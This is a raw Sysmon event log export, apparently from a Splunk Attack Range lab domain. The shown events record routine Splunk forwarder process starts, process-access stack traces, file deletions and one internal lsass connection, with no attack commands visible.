08:01:50.294{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.279{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.774{466BC892-F6EF-60EB-B07D-00000000CF01}172410156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.659{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051914692A94636B1EA63DAB9433BF2F,SHA256=668ADC157CFA01B50655D1AD94F32CB75C6CF1057F4CB6A0EED8E2870CBC3CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=352EA5F0FFB351F769522F28C8FA8DD6,SHA256=6539D0EADFAA37098CEADEDAC809101E45A9AA3729C5E2D2BBF264615F01988A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.497{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA84AB504AB2019ED84BF904FA704C19,SHA256=A47FB4B0B475CCF21F8FD45D751D4DDCE4938A6CBF699AEA6498EB6F8A338968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21A8840F5D04660D44A3DBB8196118A9,SHA256=84A6ABA4A70700208502222F1B133CA09C13BBBAC0ED5E851750FA88B9957374,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.849{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.849{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.850{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001052488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:44.846{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57388-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001052487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
